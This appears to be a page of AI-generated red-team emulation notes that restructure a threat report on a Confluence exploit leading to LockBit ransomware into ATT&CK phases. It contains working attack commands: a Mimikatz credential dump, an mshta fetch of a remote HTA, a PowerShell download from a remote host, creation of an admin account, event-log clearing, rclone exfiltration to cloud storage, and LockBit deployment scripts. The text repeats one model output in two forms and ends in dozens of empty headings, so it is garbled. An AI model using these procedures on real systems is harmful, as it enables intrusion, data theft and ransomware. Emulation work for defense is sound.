Command: mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
Technique: Credentials In Files - T1552.001
Procedure: Veeam credential dumping using Veeam-Get-Creds-New.ps1

Phase: Lateral Movement

Technique: Remote Desktop Protocol - T1021.001
Procedure: RDP lateral movement to target servers.

Phase: Collection

Technique: PDQ Deploy
Technique:Ingress Tool Transfer - T1105
- Procedure: Copied LBB.exe and ASD.bat to victim servers
Technique: Software Deployment Tools - T1072
- Procedure: Execute LBB.exe using command: cmd /k "<C:\\temp\\LBB.exe> -path \\\\<server_name>"
Technique: PowerShell - T1059.001
- Procedure: Execute test.bat script using cmd to encrypt the computers.

Phase: Command and Control

Technique: Remote Access Software - T1219
Procedure: AnyDesk for command and control.

Phase: Exfiltration

Technique: Exfiltration to Cloud Storage - T1567.002
Procedure: Rclone was configured and then used to exfiltrate sensitive data to mega.nz

Phase: Impact

Technique: Data Encrypter for Impact - T1486
Procedure: LockBit ransomware was executed manually over RDP sessions or through the PDQ deployment.

Gemini 2.5

Gemini 2.5
Model: gemini-2.5-flash-preview-05-20 Here are the extracted and structured procedures used by the threat actor for red team emulation, focusing on commands, tools, and attack techniques, with IOCs excluded. Phase: Initial Access Technique: Exploit Public-Facing Application (T1190) - CVE-2023-22527 Procedure: The threat actor exploited a critical remote code execution vulnerability (CVE-2023-22527) in an exposed Windows Confluence server by injecting OGNL expressions via crafted HTTP POST requests. Inferred Command (within OGNL payload): `exec({"net user"})` Inferred Command (within OGNL payload): `exec({"whoami"})` Phase: Execution Technique: System Binary Proxy Execution: Mshta (T1218.005) Command: `mshta http://<remote_ip>:<port>/<hta_file>.hta` Procedure: The HTA file executed an encoded PowerShell command. Technique: PowerShell Execution (T1059.001) Procedure: The PowerShell script dynamically loaded Windows API functions (`VirtualAlloc`, `VirtualProtect`, `CreateThread`, `WaitForSingleObject`). Procedure: It allocated memory, copied base64-decoded Metasploit shellcode into it, changed memory protection, and created a new thread to execute the shellcode. Technique: Windows Command Shell (T1059.003) Command: `cmd.exe /k <command>` (used for various purposes like ransomware execution) Tool: Metasploit Procedure: Established command and control (C2) connection. Tool: AnyDesk Procedure: Downloaded and installed the AnyDesk client. Tool: PDQ Deploy (T1072 - Software Deployment Tools) Procedure: Transferred the PDQ Deploy executable and LockBit binary to a temporary directory on the beachhead host. Procedure: Created a batch file (`asd.bat`) to launch the LockBit executable. `asd.bat` Content: `start /B LBB.exe` Procedure: Leveraged PDQ Deploy to automate ransomware distribution across the network. Command (via PDQ runner): `cmd.exe /s /c asd.bat` Tool: LockBit Black (LBB.exe) Procedure: Manually executed the ransomware binary on targeted servers over RDP sessions. Procedure: Deployed a batch file (`test.bat`) for secondary encryption waves, designed to mount remote C$ shares. `test.bat` Example Command: `start cmd /k "C:\temp\LBB.exe -path \\<target_share>"` (repeated for various shares like C$, ADMIN$, NETLOGON, SYSVOL, etc.) Phase: Persistence Technique: Windows Service (T1543.003) Command: `powershell -c (New-Object Net.WebClient).DownloadFile('http://<remote_domain>/AnyDesk.msi', 'AnyDesk.msi')` Procedure: Installed AnyDesk as a service with an auto-start type to ensure persistent remote access after restarts. Technique: Create Account (T1136) & Local Accounts (T1078.003) Command: `net user <account_name> <password> /add` Command: `net localgroup "Administrators" <account_name> /add` Procedure: Created a new local administrator account and added it to the local Administrators group. Phase: Privilege Escalation Technique: LSASS Memory (T1003.001) Tool: Mimikatz Procedure: Executed Mimikatz to dump credentials from the LSASS process, leading to the disclosure of crackable hashes for administrator accounts. Phase: Defense Evasion Technique: Impair Defenses Procedure: Manually turned off Windows Defender by navigating to 'Virus & threat protection' settings. Technique: Clear Windows Event Logs (T1070.001) Command: `wevtutil el \| Foreach-Object {wevtutil cl "$_"}` Procedure: Cleared Windows event logs to remove forensic evidence. Technique: Indicator Removal (File Deletion) Procedure: Deleted dropped tools (e.g., Mimikatz binaries, Rclone, PDQ Deploy, NetScan executables) from temporary directories after use. Phase: Credential Access Technique: LSASS Memory (T1003.001) Tool: Mimikatz Procedure: Executed Mimikatz to dump credentials, identified by process access to `lsass.exe`. Technique: Credentials in Files (T1552.001) Tool: Notepad.exe Command: `notepad.exe <path_to_passwords_file>.txt` Procedure: Reviewed captured passwords by opening a newly generated password file (e.g., `passwords.txt`) with Notepad. Tool: PowerShell script (Veeam-Get-Creds-New.ps1) Command: `powershell -f Veeam-Get-Creds-New.ps1` Procedure: Ran a PowerShell script to extract Veeam credentials. Procedure: Discovered and accessed a text file containing IT-related cleartext passwords on a file share server. Phase: Discovery Technique: System Network Configuration Discovery (T1016) Command: `hostname` Command: `ipconfig` Technique: System Owner/User Discovery (T1033) Command: `net user` Command: `query user` Command: `net group "domain admins" /domain` Technique: Process Discovery (T1057) Command: `tasklist` Technique: Network Service Discovery (T1046) Tool: SoftPerfect's NetScan (`netscan.exe`) Procedure: Used NetScan to enumerate remote hosts and services across the network, including checking for write access on SMB shares. Phase: Lateral Movement Technique: Remote Desktop Protocol (T1021.001) Tool: Remote Desktop Connection (`mstsc.exe`) Procedure: Leveraged RDP for interactive logons and lateral movement to targeted hosts, including backup servers, file share servers, and domain controllers. Technique: Remote Service Session Hijacking Procedure: Reused active RDP sessions for manual ransomware execution. Phase: Collection Procedure: Copied relevant files (e.g., `.xls`, `.doc` files) to a temporary directory on the beachhead host prior to exfiltration. Phase: Command and Control Technique: Remote Access Software (T1219) Tool: AnyDesk Procedure: Established remote access and C2 via AnyDesk. Phase: Exfiltration Technique: Exfiltration to Cloud Storage (T1567.002) Tool: Rclone Command: `rclone --config=rclone.conf copy <local_file_share> <cloud_storage_remote>:FTP` Procedure: Exfiltrated sensitive data from a file share server to cloud storage (Mega.nz). Phase: Impact Technique: Data Encrypted for Impact (T1486) Tool: LockBit Black ransomware (`LBB.exe`) Procedure: Executed the LockBit ransomware across the environment, leading to file encryption and renaming with a specific extension. Procedure: Left a ransom note (`README.txt`) on compromised hosts and modified the desktop background. Technique: Service Stop Command: `net stop MSExchangeUM` Command: `taskkill /f /im sql` Procedure:* Stopped key services associated with Exchange and SQL on the Exchange server to facilitate encryption.

Model: gemini-2.5-flash-preview-05-20

Here are the extracted and structured procedures used by the threat actor for red team emulation, focusing on commands, tools, and attack techniques, with IOCs excluded.

Phase: Initial Access

Technique: Exploit Public-Facing Application (T1190) - CVE-2023-22527
- Procedure: The threat actor exploited a critical remote code execution vulnerability (CVE-2023-22527) in an exposed Windows Confluence server by injecting OGNL expressions via crafted HTTP POST requests.
- Inferred Command (within OGNL payload): exec({"net user"})
- Inferred Command (within OGNL payload): exec({"whoami"})

Phase: Execution

Technique: System Binary Proxy Execution: Mshta (T1218.005)
- Command: mshta http://<remote_ip>:<port>/<hta_file>.hta
- Procedure: The HTA file executed an encoded PowerShell command.
Technique: PowerShell Execution (T1059.001)
- Procedure: The PowerShell script dynamically loaded Windows API functions (VirtualAlloc, VirtualProtect, CreateThread, WaitForSingleObject).
- Procedure: It allocated memory, copied base64-decoded Metasploit shellcode into it, changed memory protection, and created a new thread to execute the shellcode.
Technique: Windows Command Shell (T1059.003)
- Command: cmd.exe /k <command> (used for various purposes like ransomware execution)
Tool: Metasploit
- Procedure: Established command and control (C2) connection.
Tool: AnyDesk
- Procedure: Downloaded and installed the AnyDesk client.
Tool: PDQ Deploy (T1072 - Software Deployment Tools)
- Procedure: Transferred the PDQ Deploy executable and LockBit binary to a temporary directory on the beachhead host.
- Procedure: Created a batch file (asd.bat) to launch the LockBit executable.
- asd.bat Content: start /B LBB.exe
- Procedure: Leveraged PDQ Deploy to automate ransomware distribution across the network.
- Command (via PDQ runner): cmd.exe /s /c asd.bat
Tool: LockBit Black (LBB.exe)
- Procedure: Manually executed the ransomware binary on targeted servers over RDP sessions.
- Procedure: Deployed a batch file (test.bat) for secondary encryption waves, designed to mount remote C$ shares.
- test.bat Example Command: start cmd /k "C:\temp\LBB.exe -path \\<target_share>" (repeated for various shares like C$, ADMIN$, NETLOGON, SYSVOL, etc.)

Phase: Persistence

Technique: Windows Service (T1543.003)
- Command: powershell -c (New-Object Net.WebClient).DownloadFile('http://<remote_domain>/AnyDesk.msi', 'AnyDesk.msi')
- Procedure: Installed AnyDesk as a service with an auto-start type to ensure persistent remote access after restarts.
Technique: Create Account (T1136) & Local Accounts (T1078.003)
- Command: net user <account_name> <password> /add
- Command: net localgroup "Administrators" <account_name> /add
- Procedure: Created a new local administrator account and added it to the local Administrators group.

Phase: Privilege Escalation

Technique: LSASS Memory (T1003.001)
- Tool: Mimikatz
- Procedure: Executed Mimikatz to dump credentials from the LSASS process, leading to the disclosure of crackable hashes for administrator accounts.

Phase: Defense Evasion

Technique: Impair Defenses
- Procedure: Manually turned off Windows Defender by navigating to 'Virus & threat protection' settings.
Technique: Clear Windows Event Logs (T1070.001)
- Command: wevtutil el | Foreach-Object {wevtutil cl "$_"}
- Procedure: Cleared Windows event logs to remove forensic evidence.
Technique: Indicator Removal (File Deletion)
- Procedure: Deleted dropped tools (e.g., Mimikatz binaries, Rclone, PDQ Deploy, NetScan executables) from temporary directories after use.

Phase: Credential Access

Technique: LSASS Memory (T1003.001)
- Tool: Mimikatz
- Procedure: Executed Mimikatz to dump credentials, identified by process access to lsass.exe.
Technique: Credentials in Files (T1552.001)
- Tool: Notepad.exe
- Command: notepad.exe <path_to_passwords_file>.txt
- Procedure: Reviewed captured passwords by opening a newly generated password file (e.g., passwords.txt) with Notepad.
Tool: PowerShell script (Veeam-Get-Creds-New.ps1)
- Command: powershell -f Veeam-Get-Creds-New.ps1
- Procedure: Ran a PowerShell script to extract Veeam credentials.
- Procedure: Discovered and accessed a text file containing IT-related cleartext passwords on a file share server.

Phase: Discovery

Technique: System Network Configuration Discovery (T1016)
- Command: hostname
- Command: ipconfig
Technique: System Owner/User Discovery (T1033)
- Command: net user
- Command: query user
- Command: net group "domain admins" /domain
Technique: Process Discovery (T1057)
- Command: tasklist
Technique: Network Service Discovery (T1046)
- Tool: SoftPerfect's NetScan (netscan.exe)
- Procedure: Used NetScan to enumerate remote hosts and services across the network, including checking for write access on SMB shares.

Phase: Lateral Movement

Technique: Remote Desktop Protocol (T1021.001)
- Tool: Remote Desktop Connection (mstsc.exe)
- Procedure: Leveraged RDP for interactive logons and lateral movement to targeted hosts, including backup servers, file share servers, and domain controllers.
Technique: Remote Service Session Hijacking
- Procedure: Reused active RDP sessions for manual ransomware execution.

Phase: Collection

Procedure: Copied relevant files (e.g., .xls, .doc files) to a temporary directory on the beachhead host prior to exfiltration.

Phase: Command and Control

Technique: Remote Access Software (T1219)
- Tool: AnyDesk
- Procedure: Established remote access and C2 via AnyDesk.

Phase: Exfiltration

Technique: Exfiltration to Cloud Storage (T1567.002)
- Tool: Rclone
- Command: rclone --config=rclone.conf copy <local_file_share> <cloud_storage_remote>:FTP
- Procedure: Exfiltrated sensitive data from a file share server to cloud storage (Mega.nz).

Phase: Impact

Technique: Data Encrypted for Impact (T1486)
- Tool: LockBit Black ransomware (LBB.exe)
- Procedure: Executed the LockBit ransomware across the environment, leading to file encryption and renaming with a specific extension.
- Procedure: Left a ransom note (README.txt) on compromised hosts and modified the desktop background.
Technique: Service Stop
- Command: net stop MSExchangeUM
- Command: taskkill /f /im sql*
- Procedure: Stopped key services associated with Exchange and SQL on the Exchange server to facilitate encryption.

Confluence Exploit Leads to LockBit Ransomware

Phase: Initial Access

Phase: Execution

Phase: Persistence

Phase: Privilege Escalation

Phase: Lateral Movement

Phase: Credential Access

Phase: Exfiltration

Phase: Impact

Phase: Initial Access

Phase: Discovery

Phase: Execution

Phase: Command and Control

Phase: Persistence

Phase: Discovery

Phase: Privilege Escalation

Phase: Lateral Movement

Phase: Credential Access

Phase: Discovery

Phase: Lateral Movement

Phase: Credential Access

Phase: Exfiltration

Phase: Defense Evasion

Phase: Lateral Movement

Phase: Discovery

Phase: Initial Access

Phase: Execution

Phase: Execution and Lateral Movement

Phase: Execution on Exchange Server

Phase: Initial Access

Phase: Execution

Phase: Post-Exploitation

Phase: Execution

Phase: Initial Access

Phase: Execution

Tools and Methodology

Phase: Execution

Phase: Execution

Phase: Defense Evasion

Phase: Persistence

Phase: Privilege Escalation

Phase: Privilege Escalation

Phase: Execution

Phase: Credential Access

Phase: Defense Evasion

Phase: Exfiltration

Phase: Credential Access

Phase: Credential Access

Phase: Initial Access

Phase: Discovery

Phase: Execution

Phase: Credential Access

Phase: Defense Evasion

Phase: Persistence

Phase: Discovery

Phase: Execution

Phase: Credential Access

Phase: Lateral Movement

Phase: Collection

Phase: Exfiltration

Phase: Command and Control

Phase: Initial Access

Phase: Discovery

Phase: Exfiltration

Phase: Configuration and Execution

Phase: Execution

Phase: Delivery

Phase: Impact

Additional Details

Phase: Initial Access

Phase: Execution

Phase: Lateral Movement / Deployment

Phase: Impact

Phase: Initial Access

Phase: Execution

Phase: Lateral Movement

Phase: Impact

Phase: Persistence

Phase: Initial Access

Phase: Execution